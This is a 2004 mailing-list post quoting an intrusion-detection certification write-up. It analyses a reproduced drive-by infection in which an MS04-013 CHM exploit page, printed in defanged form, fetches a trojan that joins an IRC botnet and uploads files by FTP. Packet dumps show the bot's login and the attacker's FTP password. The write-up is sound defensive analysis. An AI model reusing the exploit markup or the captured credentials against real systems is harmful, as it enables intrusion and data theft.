
Re: LOGS: GIAC GCIA Version 3.4 Practical Detect Alva Lease 'Skip' Duckwall: msg#00079

security.intrusions

Subject: Re: LOGS: GIAC GCIA Version 3.4 Practical Detect Alva Lease 'Skip' Duckwall IV

Hi,

A wonderful detect. Hope to see more DIY detects and analysis.

BTW, sorry could not contribute to comments. Good luck.

Rgds.

----- Original Message -----
From: <skip1@xxxxxxxxxxxx>
To: "Intrusions List \(GCIA Practicals\)" <intrusions@xxxxxxxxxxxxxx>
Sent: Monday, May 24, 2004 8:47 PM
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect Alva
Lease 'Skip' Duckwall IV


>
> This is my second attempt at sending this to the list. Hopefully it will
> go better than the first attempt....
>
> Anyways, my name is Alva Lease 'Skip' Duckwall and here is my first detect
> writeup. Feel free to comment and abuse it as you see fit ;-)
>
> Alva Lease 'Skip' Duckwall IV
> CISSP, RHCE, SCSA
> ---------------------------------------------
>
> 1. Source of trace
>
> These detects were captured on a stealth interface connected to a hub.
> The DSL modem network port for my home network is also plugged into
> that hub so all traffic in and out of the DSL modem was captured.
>
> These traces were captured using 'tcpdump -w (filename) -s0'.
>
> 2. Detect was generated by:
>
> This is a reproduction of a compromise that occurred on the network at
> work. For various reasons, I was not allowed to use the log data
> gathered from work for this detect, so I did the next best thing,
> reproduce it as best I could from home under well-controlled
> circumstances. It should be noted that I only proceeded with the home
> network option after it was determined that my workplace wasn't going
> to take any legal action against the site(s) in question.
>
> Predicated on the above information, I consider this to be a 'lab
> generated' detect even though the practical assignment states "It must
> be stressed that our definition of a lab generated detect means detects
> generated and obtained from completely separated and non-Internet
> connected systems." My VMWARE environment was connected to the
> Internet so I could capture the entire attack as part of the
> reproduction.
>
> A little history: We were alerted to a problem with the host in
> question when a signature fired that detected attempts to join an IRC
> server on the Internet. Further investigation of this event indicated
> that the host in question was attempting to sign into the remote server
> with an IRC nickname of "X-bot17234-29327" where the numbers between
> the 'X-bot' portion of the nickname and the dash changed, while the
> numbers after the dash did not. The compromised machine would also
> transmit via FTP files to the master server. Furthermore, the machine
> in question would try to connect to the IRC channel and FTP files every
> 30 minutes with a high degree of accuracy (within 3 seconds). Further
> explanation will be discussed in the 'attack mechanism' portion of this
> analysis.
>
> After a thorough examination of all logs available to me as well as all
> IDS events for the machine in question, the method used to compromise
> the machine was discovered. I then replicated the event at home and
> captured all the packets after it was determined that no legal action
> was to be taken against any of the participants.
>
> Both of the servers had been taken offline.
>
> 3. Probability source address was spoofed:
>
> The source addresses were not spoofed since all of the traffic was TCP.
> However, I believe that both of the hosts involved were compromised.
>
> 4. Description of the attack
>
> This attack has two major components. The first component is an
> exploit of the bug described in MS04-013 (as well as CAN-2004-0380)
> which allows the second exploit to be downloaded and executed without
> user intervention. The second exploit uses a carefully crafted
> Microsoft Compressed Help Manual (CHM file) to execute arbitrary code.
> This combination of attacks is popular in many phishing attacks (see
> correlations) and in some extreme examples, like the one I provide, it
> can lead to compromise of the machine being attacked.
>
> The basic timeline of events is as follows:
>
> 1) The user visits an untrusted (or possibly hacked) website which will
> open a popup window with the first set of exploit code in it.
> 2) The first exploit (MS04-013/CAN-2004-0380) downloads the hostile CHM
> code to the local machine.
> 3) The hostile CHM code is executed which will then download the trojan
> components.
> 4) The trojan components are then installed and begin to execute.
>
>
> 5. Attack mechanism
>
> The website that appeared in a popup window was www.news-distributor.com.
>
> This is the index page from this site:
>
> " <html> <body> <script> var
> oWin=window.open("msits.html","Child","width=50, height=50,
> screenX,left=5000, screenY,top=5000, menubar=no"); </script> <IMG
> src="http://216.55.161.45/cgi-bin/stats/PageStat.pl"; WIDTH="1"
> HEIGHT="1">
> </body> "
>
> This page opens the http://www.news-distributor.com/msits.html page in
> yet another popup window. It also runs a CGI script that is possibly
> used to track information about the users visiting this page.
>
> The contents of http://www.news-distributor.com/msits.html (Please note
> that the exploit has been obfuscated to prevent detection by any
> antivirus software. It WILL NOT work in its current form.)
>
> " <html> <body onUnload='confirm("Do you want to close this window?")'>
> <script> self.moveTo(5000,5000); </script><object data="ms-
> its(colon)mhtml(colon)file(colon)//C(colon)\\MAIN.MHT(bang)http://www.n
> ews-distributor.com(slash)(slash)main.chm(colon)(colon)/main.htm"
> type="text/x-scriptlet"></object> </body> </html> "
>
> This code exploits the vulnerability described in MS04-013/CAN-2004-0380
> to download and execute the chm file at
> http://www.news-distributor.com/main.chm.
>
> According to the network detects, the following files were downloaded
> from 216.55.161.45: svchost.ini, SVCHOST.EXE, dlcomcnf.exe, url.txt,
> and title.txt.
>
> SVCHOST.EXE is the trojan. A quick look at the binary shows that it
> was compressed with UPX. Further examination of the uncompressed
> binary yielded references to it acting as a SOCKS proxy. There was
> also a reference to a slightly different pagestat.pl url named
> pagestat2.pl. Perhaps this second cgi script was put there to gather
> some sort of statistics as to the success rate of infection. As of this
> writing no major antivirus or anti-spyware software was able to
> identify it. A sample was submitted to Symantec and McAfee.
>
> svchost.ini is the control file for the trojan. The control file
> contains encrypted statements. More than likely it contains the
> information needed to log into the IRC server and the FTP server.
>
> dlcomcnf.exe is a self extracting archive that contains a DLL.
>
> Two text files url.txt and title.txt contain URLs and title keywords
> that the trojan looks for. Examples contained in url.txt are
> 'dallasfed.org', 'ml.com', and 'jpmorgan.com'. Examples from title.txt
> are 'bank', 'money', 'mail', and 'log'.
>
> The following detect shows communication from the VMWARE box to
> 216.55.161.45 on TCP port 34902. This appears to be IRC traffic. I
> have not shown any of the channel listings since it would give away the
> names and IP addresses of compromised machines. The address has been
> obfuscated and the checksums have been changed.
>
> 23:12:47.847453 IP 10.10.10.138.1106 > 216.55.161.45.34902: S
> 3639828070:3639828070(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
> 23:12:47.924763 IP 216.55.161.45.34902 > 10.10.10.138.1106: S
> 4063190951:4063190951(0) ack 3639828071 win 5840 <mss
> 1460,nop,nop,sackOK> (DF)
> 23:12:47.925046 IP 10.10.10.138.1106 > 216.55.161.45.34902: . ack 1
> win 17520 (DF)
> 23:12:48.937192 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 1:23(22)
> ack 1 win 17520 (DF)
> 0x0000 4500 003e 0409 4000 8006 f6b0 0a0a 0a8a E..>..@.....E.A.
> 0x0010 d837 a12d 0452 8856 d8f3 5e67 f22f 5fa8 .7.-.R.V..^g./_.
> 0x0020 5018 4470 f283 0000 4e49 434b 2058 2d62 P.Dp....NICK.X-b
> 0x0030 6f74 3939 3238 2d35 3939 3539 0d0a ot9928-59959..
> 23:12:49.010010 IP 216.55.161.45.34902 > 10.10.10.138.1106: . ack 23
> win 5840 (DF)
>
> Here the IRC nickname is set to X-bot9928-59959. It is worth noting
> that there was a port listening on the machine 59959 that might be a
> SOCKS proxy, since there are references to SOCKS in the binary.
>
> 23:12:49.010583 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 23:82(59)
> ack 1 win 17520 (DF)
> 0x0000 4500 0063 040a 4000 8006 f68a 0a0a 0a8a E..c..@.....E.A.
> 0x0010 d837 a12d 0452 8856 d8f3 5e7d f22f 5fa8 .7.-.R.V..^}./_.
> 0x0020 5018 4470 3258 0000 5553 4552 204a 6262 P.Dp2X..USER.Jbb
> 0x0030 3467 3639 3932 3841 3120 4855 4748 2d38 4g69928A1.HUGH-8
> 0x0040 4e31 4a41 4a59 4255 5920 7365 7276 6572 N1JAJYBUY.server
> 0x0050 203a 582d 626f 7439 3932 382d 3539 3935 .:X-bot9928-5995
> 0x0060 390d 0a 9..
>
> N1JaJYBUY is maybe somebody's name?
>
> 23:12:49.086404 IP 216.55.161.45.34902 > 10.10.10.138.1106: . ack 82
> win 5840 (DF)
> 23:12:49.203219 IP 216.55.161.45.34902 > 10.10.10.138.1106: P
> 1:1067(1066) ack 82 win 5840 (DF)
> 0x0000 4500 0452 6bca 4000 3706 d3db d837 a12d E..Rk.@.7....7.-
> 0x0010 0a0a 0a8a 8856 0452 f22f 5fa8 d8f3 5eb8 E.A..V.R./_...^.
> 0x0020 5018 16d0 2a84 0000 3a73 6572 7665 722e P...*...:server.
> 0x0030 6461 6c2e 6e65 7420 3030 3120 582d 626f dal.net.001.X-bo
> 0x0040 7439 3932 382d 3539 3935 3920 3a57 656c t9928-59959.:Wel
> 0x0050 636f 6d65 2074 6f20 7468 6520 496e 7465 come.to.the.Inte
> 0x0060 726e 6574 2052 656c 6179 204e 6574 776f rnet.Relay.Netwo
> 0x0070 726b 2058 2d62 6f74 3939 3238 2d35 3939 rk.X-bot9928-599
> 0x0080 3539 215e 4a62 6234 6736 3939 3240 6464 59!^Jbb4g6992@dd
> 0x0090 6464 6464 6464 6464 6464 6464 2e64 6464 dddddddddddd.ddd
> 0x00a0 642e 6464 642e 6464 6464 6464 6464 642e d.ddd.ddddddddd.
> 0x00b0 6464 640d 0a3a 7365 7276 6572 2e64 616c ddd..:server.dal
> 0x00c0 2e6e 6574 2030 3032 2058 2d62 6f74 3939 .net.002.X-bot99
> 0x00d0 3238 2d35 3939 3539 203a 596f 7572 2068 28-59959.:Your.h
> 0x00e0 6f73 7420 6973 2073 6572 7665 722e 6461 ost.is.server.da
> 0x00f0 6c2e 6e65 742c 2072 756e 6e69 6e67 2052 l.net,.running.R
> 0x0100 7573 4e65 742d 312e 342e 3270 7265 5f31 usNet-1.4.2pre_1
> 0x0110 3620 286f 7269 672e 2032 2e31 302e 3370 6.(orig..2.10.3p
> 0x0120 3529 0d0a 3a73 6572 7665 722e 6461 6c2e 5)..:server.dal.
> 0x0130 6e65 7420 3030 3320 582d 626f 7439 3932 net.003.X-bot992
> 0x0140 382d 3539 3935 3920 3a54 6869 7320 7365 8-59959.:This.se
> 0x0150 7276 6572 2077 6173 2063 7265 6174 6564 rver.was.created
> 0x0160 2054 7565 204d 6172 2032 2032 3030 3420 .Tue.Mar.2.2004.
> 0x0170 6174 2032 313a 3530 3a31 3020 5053 540d at.21:50:10.PST.
> 0x0180 0a3a 7365 7276 6572 2e64 616c 2e6e 6574 .:server.dal.net
> 0x0190 2030 3034 2058 2d62 6f74 3939 3238 2d35 .004.X-bot9928-5
> 0x01a0 3939 3539 2073 6572 7665 722e 6461 6c2e 9959.server.dal.
> 0x01b0 6e65 7420 322e 3130 2e33 7035 2061 6f4f net.2.10.3p5.aoO
> 0x01c0 6972 7778 2061 6263 6569 496b 6c6d 6e6f irwx.abceiIklmno
> 0x01d0 4f70 7172 7374 767a 0d0a 3a73 6572 7665 Opqrstvz..:serve
> 0x01e0 722e 6461 6c2e 6e65 7420 3030 3520 582d r.dal.net.005.X-
> 0x01f0 626f 7439 3932 382d 3539 3935 3920 5052 bot9928-59959.PR
> 0x0200 4546 4958 3d28 6f76 2940 2b20 4d4f 4445 EFIX=(ov)@+.MODE
> 0x0210 533d 3320 4348 414e 5459 5045 533d 2326 S=3.CHANTYPES=#&
> 0x0220 212b 204d 4158 4348 414e 4e45 4c53 3d31 !+.MAXCHANNELS=1
> 0x0230 3020 4e49 434b 4c45 4e3d 3331 2054 4f50 0.NICKLEN=31.TOP
> 0x0240 4943 4c45 4e3d 3235 3520 4b49 434b 4c45 ICLEN=255.KICKLE
> 0x0250 4e3d 3235 3520 4e45 5457 4f52 4b3d 5275 N=255.NETWORK=Ru
> 0x0260 734e 6574 2043 4841 4e4d 4f44 4553 3d62 sNet.CHANMODES=b
> 0x0270 6549 2c6b 2c6c 2c61 6369 6d6e 7073 7274 eI,k,l,acimnpsrt
> 0x0280 7a20 3a61 7265 2073 7570 706f 7274 6564 z.:are.supported
> 0x0290 2062 7920 7468 6973 2073 6572 7665 720d .by.this.server.
> 0x02a0 0a3a 7365 7276 6572 2e64 616c 2e6e 6574 .:server.dal.net
> 0x02b0 2032 3531 2058 2d62 6f74 3939 3238 2d35 .251.X-bot9928-5
> 0x02c0 3939 3539 203a 5468 6572 6520 6172 6520 9959.:There.are.
> 0x02d0 3930 3620 7573 6572 7320 616e 6420 3020 906.users.and.0.
> 0x02e0 7365 7276 6963 6573 206f 6e20 3120 7365 services.on.1.se
> 0x02f0 7276 6572 730d 0a3a 7365 7276 6572 2e64 rvers..:server.d
> 0x0300 616c 2e6e 6574 2032 3533 2058 2d62 6f74 al.net.253.X-bot
> 0x0310 3939 3238 2d35 3939 3539 2034 203a 756e 9928-59959.4.:un
> 0x0320 6b6e 6f77 6e20 636f 6e6e 6563 7469 6f6e known.connection
> 0x0330 730d 0a3a 7365 7276 6572 2e64 616c 2e6e s..:server.dal.n
> 0x0340 6574 2032 3534 2058 2d62 6f74 3939 3238 et.254.X-bot9928
> 0x0350 2d35 3939 3539 2031 3320 3a63 6861 6e6e -59959.13.:chann
> 0x0360 656c 7320 666f 726d 6564 0d0a 3a73 6572 els.formed..:ser
> 0x0370 7665 722e 6461 6c2e 6e65 7420 3235 3520 ver.dal.net.255.
> 0x0380 582d 626f 7439 3932 382d 3539 3935 3920 X-bot9928-59959.
> 0x0390 3a49 2068 6176 6520 3930 3620 7573 6572 :I.have.906.user
> 0x03a0 732c 2030 2073 6572 7669 6365 7320 616e s,.0.services.an
> 0x03b0 6420 3020 7365 7276 6572 730d 0a3a 7365 d.0.servers..:se
> 0x03c0 7276 6572 2e64 616c 2e6e 6574 2032 3635 rver.dal.net.265
> 0x03d0 2058 2d62 6f74 3939 3238 2d35 3939 3539 .X-bot9928-59959
> 0x03e0 203a 4375 7272 656e 7420 6c6f 6361 6c20 .:Current.local.
> 0x03f0 7573 6572 733a 2039 3036 2020 4d61 783a users:.906..Max:
> 0x0400 2031 3037 300d 0a3a 7365 7276 6572 2e64 .1070..:server.d
> 0x0410 616c 2e6e 6574 2032 3636 2058 2d62 6f74 al.net.266.X-bot
> 0x0420 3939 3238 2d35 3939 3539 203a 4375 7272 9928-59959.:Curr
> 0x0430 656e 7420 676c 6f62 616c 2075 7365 7273 ent.global.users
> 0x0440 3a20 3930 3620 204d 6178 3a20 3130 3730 :.906..Max:.1070
> 0x0450 0d0a ..
>
> This section says that there are 906 users on the system out of 1070.
> This seems to indicate that there are at least 900 machines that are
> infected with this trojan. Further analysis of the channel seems to
> bear this out. I'm not including this channel information because it
> contains IP addresses and the SOCKS port information.
>
> 23:12:49.290751 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 82:99(17)
> ack 1067 win 16454 (DF)
> 0x0000 4500 0039 040c 4000 8006 f6b2 0a0a 0a8a E..9..@.....E.A.
> 0x0010 d837 a12d 0452 8856 d8f3 5eb8 f22f 63d2 .7.-.R.V..^../c.
> 0x0020 5018 4046 ab73 0000 4a4f 494e 203a 2373 P.@F.s..JOIN.:#s
> 0x0030 7570 6572 746f 790d 0a upertoy..
>
> The channel name is #supertoy. Perhaps this is the name of the trojan.
>
> Here is some of the FTP traffic. Please note that this traffic was
> captured before the previous IRC traffic. This traffic is presented
> out of order because I felt it was better to present the IRC traffic
> first.
>
> 22:28:09.964008 10.10.10.138.3604 > 216.55.161.45.ftp: S
> 535955192:535955192(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
>
> 22:28:10.038087 216.55.161.45.ftp > 10.10.10.138.3604: S
> 3993608827:3993608827(0) ack 535955193 win 5840 <mss
> 1460,nop,nop,sackOK>
>
> 22:28:10.038414 10.10.10.138.3604 > 216.55.161.45.ftp: . ack 1 win
> 64240 (DF)
>
> 22:28:10.113441 216.55.161.45.ftp > 10.10.10.138.3604: P 1:21(20) ack 1
> win 5840 (DF)
>
> 22:28:10.114372 10.10.10.138.3604 > 216.55.161.45.ftp: P 1:14(13) ack
> 21 win 64220 (DF)
> 0x0000 4500 0035 4f1a 4000 8006 aba8 0a0a 0a8a E..5O.@.....E.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 06f9 ee09 a290 .7.-............
> 0x0020 5018 fadc f155 0000 5553 4552 2061 7061 P....U..USER.apa
> 0x0030 6368 650d 0a che..
>
> Username is apache. He probably logs directly into the webroot for the
> machine.
>
> 22:28:10.187860 216.55.161.45.ftp > 10.10.10.138.3604: . ack 14 win
> 5840 (DF)
>
> 22:28:10.190064 216.55.161.45.ftp > 10.10.10.138.3604: P 21:55(34) ack
> 14 win 5840 (DF)
> 0x0000 4500 004a 70c6 4000 3706 d2e7 d837 a12d E..Jp.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a290 1ff2 0706 E.A.............
> 0x0020 5018 16d0 8bfd 0000 3333 3120 506c 6561 P.......331.Plea
> 0x0030 7365 2073 7065 6369 6679 2074 6865 2070 se.specify.the.p
> 0x0040 6173 7377 6f72 642e 0d0a assword...
>
> 22:28:10.190827 10.10.10.138.3604 > 216.55.161.45.ftp: P 14:31(17) ack
> 55 win 64186 (DF)
> 0x0000 4500 0039 4f1e 4000 8006 aba0 0a0a 0a8a E..9O.@.....E.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 0706 ee09 a2b2 .7.-............
> 0x0020 5018 faba 62ed 0000 5041 5353 204d 6e37 P...b...PASS.Mn7
> 0x0030 507a 3431 5f63 6c0d 0a Pz41_cl..
>
> A password of "Mn7Pz41_cl". I wish I could get my users to use such a
> secure password. Of course it doesn't help that it was sent in clear
> text. ;-)
>
> 22:28:10.268202 216.55.161.45.ftp > 10.10.10.138.3604: P 55:88(33) ack
> 31 win 5840 (DF)
> 0x0000 4500 0049 70c7 4000 3706 d2e7 d837 a12d E..Ip.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a2b2 1ff2 0717 E.A.............
> 0x0020 5018 16d0 6eb8 0000 3233 3020 4c6f 6769 P...n...230.Logi
> 0x0030 6e20 7375 6363 6573 7366 756c 2e20 4861 n.successful..Ha
> 0x0040 7665 2066 756e 2e0d 0a ve.fun...
>
> 22:28:10.269584 10.10.10.138.3604 > 216.55.161.45.ftp: P 31:44(13) ack
> 88 win 64153 (DF)
> 0x0000 4500 0035 4f22 4000 8006 aba0 0a0a 0a8a E..5O"@.....E.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 0717 ee09 a2d3 .7.-............
> 0x0020 5018 fa99 8359 0000 4d4b 4420 746f 796c P....Y..MKD.toyl
> 0x0030 6f67 730d 0a ogs..
>
> 22:28:10.344596 216.55.161.45.ftp > 10.10.10.138.3604: P 88:128(40) ack
> 44 win 5840 (DF)
> 0x0000 4500 0050 70c8 4000 3706 d2df d837 a12d E..Pp.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a2d3 1ff2 0724 E.A............$
> 0x0020 5018 16d0 338b 0000 3535 3020 4372 6561 P...3...550.Crea
> 0x0030 7465 2064 6972 6563 746f 7279 206f 7065 te.directory.ope
> 0x0040 7261 7469 6f6e 2066 6169 6c65 642e 0d0a ration.failed...
>
> 22:28:10.345424 10.10.10.138.3604 > 216.55.161.45.ftp: P 44:57(13) ack
> 128 win 64113 (DF)
> 0x0000 4500 0035 4f26 4000 8006 ab9c 0a0a 0a8a E..5O&@.....E.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 0724 ee09 a2fb .7.-.......$....
> 0x0020 5018 fa71 8d40 0000 4357 4420 746f 796c P..q.@..CWD.toyl
> 0x0030 6f67 730d 0a ogs..
>
> 22:28:10.419245 216.55.161.45.ftp > 10.10.10.138.3604: P 128:165(37)
> ack 57 win 5840 (DF)
> 0x0000 4500 004d 70c9 4000 3706 d2e1 d837 a12d E..Mp.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a2fb 1ff2 0731 E.A............1
> 0x0020 5018 16d0 4724 0000 3235 3020 4469 7265 P...G$..250.Dire
> 0x0030 6374 6f72 7920 7375 6363 6573 7366 756c ctory.successful
> 0x0040 6c79 2063 6861 6e67 6564 2e0d 0a ly.changed...
>
> It attempts to make a directory called 'toylogs'. Perhaps supertoy is
> the name of the trojan after all. The directory creation failed
> because it already existed.
>
> 22:28:10.420113 10.10.10.138.3604 > 216.55.161.45.ftp: P 57:73(16) ack
> 165 win 64076 (DF)
> 0x0000 4500 0038 4f2a 4000 8006 ab95 0a0a 0a8a E..8O*@.....E.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 0731 ee09 a320 .7.-.......1....
> 0x0020 5018 fa4c 5c8a 0000 4d4b 4420 3037 2d30 P..L\...MKD.07-0
> 0x0030 342d 3230 3034 0d0a 4-2004..
>
> 22:28:10.494411 216.55.161.45.ftp > 10.10.10.138.3604: P 165:205(40)
> ack 73 win 5840 (DF)
> 0x0000 4500 0050 70ca 4000 3706 d2dd d837 a12d E..Pp.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a320 1ff2 0741 E.A............A
> 0x0020 5018 16d0 3321 0000 3535 3020 4372 6561 P...3!..550.Crea
> 0x0030 7465 2064 6972 6563 746f 7279 206f 7065 te.directory.ope
> 0x0040 7261 7469 6f6e 2066 6169 6c65 642e 0d0a ration.failed...
>
> 22:28:10.495175 10.10.10.138.3604 > 216.55.161.45.ftp: P 73:89(16) ack
> 205 win 64036 (DF)
> 0x0000 4500 0038 4f2e 4000 8006 ab91 0a0a 0a8a E..8O.@.....E.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 0741 ee09 a348 .7.-.......A...H
> 0x0020 5018 fa24 666e 0000 4357 4420 3037 2d30 P..$fn..CWD.07-0
> 0x0030 342d 3230 3034 0d0a 4-2004..
>
> 22:28:10.569571 216.55.161.45.ftp > 10.10.10.138.3604: P 205:242(37)
> ack 89 win 5840 (DF)
> 0x0000 4500 004d 70cb 4000 3706 d2df d837 a12d E..Mp.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a348 1ff2 0751 E.A........H...Q
> 0x0020 5018 16d0 46b7 0000 3235 3020 4469 7265 P...F...250.Dire
> 0x0030 6374 6f72 7920 7375 6363 6573 7366 756c ctory.successful
> 0x0040 6c79 2063 6861 6e67 6564 2e0d 0a ly.changed...
>
> It tries to create a directory called '07-04-2004' or April 7, 2004.
> The directory creation again fails because it already exists. This is
> the date I ran and gathered these detects.
>
> 22:28:10.570516 10.10.10.138.3604 > 216.55.161.45.ftp: P 89:130(41) ack
> 242 win 63999 (DF)
> 0x0000 4500 0051 4f32 4000 8006 ab74 0a0a 0a8a E..QO2@....tE.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 0751 ee09 a36d .7.-.......Q...m
> 0x0020 5018 f9ff 7173 0000 4d4b 4420 3030 4544 P...qs..MKD.00ED
> 0x0030 4331 3143 2d38 4132 382d 3436 3146 2d42 C11C-8A28-461F-B
> 0x0040 4533 3033 3344 4331 3442 3431 3545 350d E3033DC14B415E5.
> 0x0050 0a .
>
> 22:28:10.646047 216.55.161.45.ftp > 10.10.10.138.3604: P 242:313(71)
> ack 130 win 5840 (DF)
> 0x0000 4500 006f 70cc 4000 3706 d2bc d837 a12d E..op.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a36d 1ff2 077a E.A........m...z
> 0x0020 5018 16d0 b16f 0000 3235 3720 222f 746f P....o..257."/to
> 0x0030 796c 6f67 732f 3037 2d30 342d 3230 3034 ylogs/07-04-2004
> 0x0040 2f30 3045 4443 3131 432d 3841 3238 2d34 /00EDC11C-8A28-4
> 0x0050 3631 462d 4245 3330 3333 4443 3134 4234 61F-BE3033DC14B4
> 0x0060 3135 4535 2220 6372 6561 7465 640d 0a 15E5".created..
>
> 22:28:10.647366 10.10.10.138.3604 > 216.55.161.45.ftp: P 130:171(41)
> ack 313 win 63928 (DF)
> 0x0000 4500 0051 4f36 4000 8006 ab70 0a0a 0a8a E..QO6@....pE.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 077a ee09 a3b4 .7.-.......z....
> 0x0020 5018 f9b8 7b3e 0000 4357 4420 3030 4544 P...{>..CWD.00ED
> 0x0030 4331 3143 2d38 4132 382d 3436 3146 2d42 C11C-8A28-461F-B
> 0x0040 4533 3033 3344 4331 3442 3431 3545 350d E3033DC14B415E5.
> 0x0050 0a .
>
> 22:28:10.722601 216.55.161.45.ftp > 10.10.10.138.3604: P 313:350(37)
> ack 171 win 5840 (DF)
> 0x0000 4500 004d 70cd 4000 3706 d2dd d837 a12d E..Mp.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a3b4 1ff2 07a3 E.A.............
> 0x0020 5018 16d0 45f9 0000 3235 3020 4469 7265 P...E...250.Dire
> 0x0030 6374 6f72 7920 7375 6363 6573 7366 756c ctory.successful
> 0x0040 6c79 2063 6861 6e67 6564 2e0d 0a ly.changed...
>
> It was successful at creating a directory called
> '00EDC11C-8A28-461F-BE3033DC14B415E5'. This appears to be some sort of
> unique identifier. I could not find it in a registry search, so I don't
> know how this is generated.
>
>
> 22:28:10.723883 10.10.10.138.3604 > 216.55.161.45.ftp: P 171:179(8) ack
> 350 win 63891 (DF)
> 0x0000 4500 0030 4f3a 4000 8006 ab8d 0a0a 0a8a E..0O:@.....E.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 07a3 ee09 a3d9 .7.-............
> 0x0020 5018 f993 1c9d 0000 5459 5045 2049 0d0a P.......TYPE.I..
>
> 22:28:10.797750 216.55.161.45.ftp > 10.10.10.138.3604: P 350:381(31)
> ack 179 win 5840 (DF)
> 0x0000 4500 0047 70ce 4000 3706 d2e2 d837 a12d E..Gp.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a3d9 1ff2 07ab E.A.............
> 0x0020 5018 16d0 9b6b 0000 3230 3020 5377 6974 P....k..200.Swit
> 0x0030 6368 696e 6720 746f 2042 696e 6172 7920 ching.to.Binary.
> 0x0040 6d6f 6465 2e0d 0a mode...
>
> 22:28:10.798944 10.10.10.138.3604 > 216.55.161.45.ftp: P 179:185(6) ack
> 381 win 63860 (DF)
> 0x0000 4500 002e 4f3e 4000 8006 ab8b 0a0a 0a8a E...O>@.....E.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 07ab ee09 a3f8 .7.-............
> 0x0020 5018 f974 3de7 0000 5041 5356 0d0a P..t=...PASV..
>
> 22:28:10.872987 216.55.161.45.ftp > 10.10.10.138.3604: P 381:431(50)
> ack 185 win 5840 (DF)
> 0x0000 4500 005a 70cf 4000 3706 d2ce d837 a12d E..Zp.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a3f8 1ff2 07b1 E.A.............
> 0x0020 5018 16d0 4377 0000 3232 3720 456e 7465 P...Cw..227.Ente
> 0x0030 7269 6e67 2050 6173 7369 7665 204d 6f64 ring.Passive.Mod
> 0x0040 6520 2832 3136 2c35 352c 3136 312c 3435 e.(216,55,161,45
> 0x0050 2c36 352c 3232 3729 0d0a ,65,227)..
>
> 22:28:10.948186 10.10.10.138.3604 > 216.55.161.45.ftp: P 185:215(30)
> ack 431 win 63810 (DF)
> 0x0000 4500 0046 4f44 4000 8006 ab6d 0a0a 0a8a E..FOD@....mE.A.
> 0x0010 d837 a12d 0e14 0015 1ff2 07b1 ee09 a42a .7.-...........*
> 0x0020 5018 f942 bae3 0000 5354 4f52 2030 372d P..B....STOR.07-
> 0x0030 3034 2d32 3030 342d 3135 2d32 332d 3238 04-2004-15-23-28
> 0x0040 2e74 7874 0d0a .txt..
>
>
> It uploads a file called 07-04-2004-15-23-28.txt. As previously
> mentioned, 07-04-2004 is April 7, 2004. 15-23-28 is the local time
> expressed in GMT. The VMWARE machine's internal clock was set to
> Mountain Time, while the capture machine was set to Eastern Time.
>
> 22:28:11.022498 216.55.161.45.ftp > 10.10.10.138.3604: P 431:453(22)
> ack 215 win 5840 (DF)
> 0x0000 4500 003e 70d0 4000 3706 d2e9 d837 a12d E..>p.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a42a 1ff2 07cf E.A........*....
> 0x0020 5018 16d0 be97 0000 3135 3020 4f6b 2074 P.......150.Ok.t
> 0x0030 6f20 7365 6e64 2064 6174 612e 0d0a o.send.data...
>
> 22:28:11.097441 216.55.161.45.ftp > 10.10.10.138.3604: P 453:475(22)
> ack 215 win 5840 (DF)
> 0x0000 4500 003e 70d1 4000 3706 d2e8 d837 a12d E..>p.@.7....7.-
> 0x0010 0a0a 0a8a 0015 0e14 ee09 a440 1ff2 07cf E.A........@....
> 0x0020 5018 16d0 db64 0000 3232 3620 4669 6c65 P....d..226.File
> 0x0030 2072 6563 6569 7665 204f 4b2e 0d0a .receive.OK...
>
> This was all the data that was sent. Apparently it hadn't collected
> anything interesting to send home on my test system.
>
>
> 6. Correlations
>
> The vulnerability information can be found from Microsoft at
> http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx.
>
> The CVE for CAN-2004-0380 can be found at
> http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380
>
> A quick look through the Handler's diaries at isc.sans.org came up with
> a couple of blurbs on hostile chm files. Both
> http://isc.sans.org/diary.php?date=2004-04-11 and
> http://isc.sans.org/diary.php?date=2004-04-10 mention the hostile
> URL/chm files although no in-depth analysis was provided or linked to.
>
> A Google search for 'supertoy' and 'trojan' yielded references to a
> 'W32/Mooder' trojan from McAfee. However, the description of the
> trojan doesn't match the files that were downloaded and installed.
>
> A Google search for 'xbot' and 'trojan' yielded a couple of hits. One
> on pestpatrol, which has a listing for "Backdoor.IRC.XBot.a" and
> another on emsisoft.com which also lists a "Backdoor.IRC.Xbot.a".
> Neither of these contain any detailed information or writeups.
>
> A google search for 'main.chm' and 'trojan' yielded several hits
> describing phishing emails that were sent out using this file name.
> None of the hits seem to describe the trojan presented here. Links
> include:
> http://www.codephish.info/modules.php?op=modload&name=News&file=article&sid=113
> http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=121
>
> A search of the websites for both McAfee and Symantec yielded no
> results.
>
> A search of the TrendMicro website yielded a couple of hits but neither
> of these IRC bots match the description of what I've seen.
>
> 7. Evidence of active targeting
>
> There is no evidence of active targeting.
>
